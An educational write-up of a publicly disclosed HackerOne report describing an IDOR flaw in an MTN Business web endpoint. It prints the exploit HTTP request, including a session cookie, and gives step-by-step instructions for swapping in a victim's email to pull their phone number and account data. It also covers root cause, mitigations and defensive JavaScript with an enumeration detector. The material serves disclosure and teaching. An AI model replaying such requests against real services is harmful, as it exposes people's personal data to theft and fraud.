Disclaimer: I came across this bug report on HackerOne (not my own) and I wanted to clarify and showcase it for educational reasons.
Source: https://hackerone.com/reports/1773609
Overview
In this write-up, I will demonstrate how an Insecure Direct Object Reference (IDOR) vulnerability in the MTN Business website (https://mtnmobad.mtnbusiness.com.ng) allows an attacker to access sensitive user information, such as phone numbers and account details, without authorization. This bug exposes Personally Identifiable Information (PII), which is critical for user privacy.
Vulnerability Details
- Type: IDOR (Insecure Direct Object Reference)
- Endpoint: /app/getUserNotes
- Method: POST request with JSON payload
Understanding the Vulnerability
An IDOR vulnerability occurs when an application exposes objects based on user-supplied input without verifying that the requester has permission to access them. In this case, the application returns another user's account data when nothing more than that user's email address is supplied in the request body.
Vulnerable Request Example
POST /app/getUserNotes HTTP/1.1
Host: mtnmobad.mtnbusiness.com.ng
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 195
Origin: https://mtnmobad.mtnbusiness.com.ng
Connection: close
Referer: https://mtnmobad.mtnbusiness.com.ng/
Cookie: G_ENABLED_IDPS=google; connect.sid=s%3ATYGgZ8wqgEinB9zX0d7-OdZyt2jXa_ev.hQw0FOvTD5bB159jCtqA%2BXv7z%2FHROL%2B2vSS6mNK%2FqVg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{
  "params": {
    "updates": [
      {
        "param": "user",
        "value": {
          "userEmail": "<PUT_VICTIM_EMAIL_HERE>"
        },
        "op": "a"
      }
    ],
    "cloneFrom": {
      "updates": null,
      "cloneFrom": null,
      "encoder": {},
      "map": null
    },
    "encoder": {},
    "map": null
  }
}
Explanation: By modifying the userEmail parameter, an attacker can input any valid email address they know or guess. The server returns sensitive account information for that email without checking whether the request is authorized.
Exploitation Steps
Here’s how the vulnerability can be exploited step by step:
1. Log In and Intercept the Request
- Log in with a legitimate user account to access the application.
- Use a tool like Burp Suite or Postman to intercept the POST request to /app/getUserNotes when fetching user account details.
2. Modify the Request
- Replace the value of "userEmail" with the email address of another user (e.g., victim@example.com).
- Send the modified request.
3. Observe the Response
- If successful, the server responds with the personal information associated with the victim’s email, such as:
- Phone number
- Account information
- This data is exposed to the attacker without any verification of identity.
Root Cause Analysis
The root cause of the vulnerability is the lack of proper access control:
- The server trusts the userEmail parameter without verifying that the requester is authorized to access the account details tied to that email.
- The system does not validate whether the authenticated user (identified by the session cookie) is the actual owner of the email provided.
Mitigation Strategies
To prevent this kind of vulnerability, the development team should implement the following solutions:
1. Authorization Checks:
- Validate that the email parameter matches the authenticated user’s session or token.
- Ensure the requester has the appropriate permissions to access the provided email’s data.
2. Use of Unique Identifiers:
- Instead of using emails, the application should use non-guessable, unique user IDs tied to the session to fetch user data.
3. Rate Limiting and Monitoring:
- Implement rate limiting to prevent attackers from brute-forcing or enumerating email addresses.
- Monitor logs for abnormal access patterns indicating possible exploitation attempts.
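To make the root cause and the first three mitigations concrete, here is an added illustration written for this write-up; it is not code from the MTN application or from the original report. It models the /app/getUserNotes handler in its vulnerable shape (record selected purely by the client-supplied userEmail) beside a hardened shape (identity taken from the server-side session and the record fetched by a non-guessable internal ID, with a client-supplied email only accepted when it names the session's own account), and finishes with a small log check that flags sessions requesting more distinct email addresses than one account could own. The user records, session objects, function names and log lines are all constructed for the example; the request body follows the nested "updates" structure shown in the report.

```javascript
// Added illustration, not the MTN application's code: a minimal handler for
// POST /app/getUserNotes in its vulnerable and hardened forms, plus a log
// check for the enumeration pattern the write-up recommends monitoring.
// Every name, record and log line here is constructed for the example.

// Constructed user store keyed by a non-guessable internal ID.
const USERS_BY_ID = {
  "u-7f3a": { email: "alice@example.com", phone: "+234-800-000-0001", notes: ["plan: business"] },
  "u-91c2": { email: "bob@example.com",   phone: "+234-800-000-0002", notes: ["plan: starter"] },
};

// Secondary index by email, mirroring what a lookup-by-email endpoint needs.
const USERS_BY_EMAIL = Object.fromEntries(
  Object.entries(USERS_BY_ID).map(([id, u]) => [u.email, { id, ...u }])
);

// Pull userEmail out of the nested "updates" payload shown in the report.
function extractRequestedEmail(body) {
  const updates = body && body.params && Array.isArray(body.params.updates)
    ? body.params.updates : [];
  const userUpdate = updates.find((u) => u && u.param === "user" && u.value);
  const email = userUpdate ? userUpdate.value.userEmail : undefined;
  return typeof email === "string" ? email.trim().toLowerCase() : undefined;
}

// Vulnerable shape: the record is chosen purely by the client-supplied email;
// the session is never consulted, so any logged-in user can read any account.
function getUserNotesVulnerable(session, body) {
  const user = USERS_BY_EMAIL[extractRequestedEmail(body)];
  if (!user) return { status: 404, body: { error: "not found" } };
  return { status: 200, body: { phone: user.phone, notes: user.notes } };
}

// Hardened shape: identity comes from the server-side session (userId set at
// login), the record is fetched by that ID, and a client-supplied email is
// only tolerated when it names the session's own account.
function getUserNotesSecure(session, body) {
  if (!session || !session.userId) {
    return { status: 401, body: { error: "unauthenticated" } };
  }
  const user = USERS_BY_ID[session.userId];
  if (!user) return { status: 401, body: { error: "unauthenticated" } };
  const requested = extractRequestedEmail(body);
  if (requested !== undefined && requested !== user.email) {
    return { status: 403, body: { error: "forbidden" } };
  }
  return { status: 200, body: { phone: user.phone, notes: user.notes } };
}

// Constructed access-log lines (one per request to the endpoint).
const SAMPLE_LOG = [
  "2023-01-10T10:00:01Z sid=s-alice POST /app/getUserNotes email=alice@example.com status=200",
  "2023-01-10T10:00:05Z sid=s-bob POST /app/getUserNotes email=bob@example.com status=200",
  "2023-01-10T10:01:00Z sid=s-probe POST /app/getUserNotes email=a1@example.com status=200",
  "2023-01-10T10:01:01Z sid=s-probe POST /app/getUserNotes email=a2@example.com status=404",
  "2023-01-10T10:01:02Z sid=s-probe POST /app/getUserNotes email=a3@example.com status=200",
  "2023-01-10T10:01:03Z sid=s-probe POST /app/getUserNotes email=a4@example.com status=200",
  "2023-01-10T10:02:00Z sid=s-alice GET /app/profile status=200",
];

// Flag sessions that ask for more distinct emails than one account could own.
function flagEnumeratingSessions(lines, maxDistinctEmails = 1) {
  const perSession = new Map();
  for (const line of lines) {
    const m = /sid=(\S+) POST \/app\/getUserNotes email=(\S+)/.exec(line);
    if (!m) continue;
    if (!perSession.has(m[1])) perSession.set(m[1], new Set());
    perSession.get(m[1]).add(m[2].toLowerCase());
  }
  return [...perSession]
    .filter(([, emails]) => emails.size > maxDistinctEmails)
    .map(([sid]) => sid);
}

// Request body in the shape from the report, asking for a given account.
function requestFor(email) {
  return { params: { updates: [{ param: "user", value: { userEmail: email }, op: "a" }] } };
}

// Stand-alone demo: alice's session asking for bob's record.
const aliceSession = { userId: "u-7f3a" };
console.log(getUserNotesVulnerable(aliceSession, requestFor("bob@example.com"))); // leaks bob's phone
console.log(getUserNotesSecure(aliceSession, requestFor("bob@example.com")));     // 403
console.log(flagEnumeratingSessions(SAMPLE_LOG));                                 // [ 's-probe' ]
```

The hardened handler never uses the request body to decide which record to load; the body is only checked for consistency with the session so that a legitimate client that echoes its own email keeps working. The log check is deliberately simple (distinct emails per session, no time window) so the pattern is visible; a production rule would add a window and feed the flagged sessions into rate limiting or alerting.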
Impact
The vulnerability exposes Personally Identifiable Information (PII) and sensitive user data, violating privacy regulations like GDPR. If exploited, attackers can harvest personal details of multiple users, potentially leading to:
- Phishing attacks
- Identity theft
- Financial fraud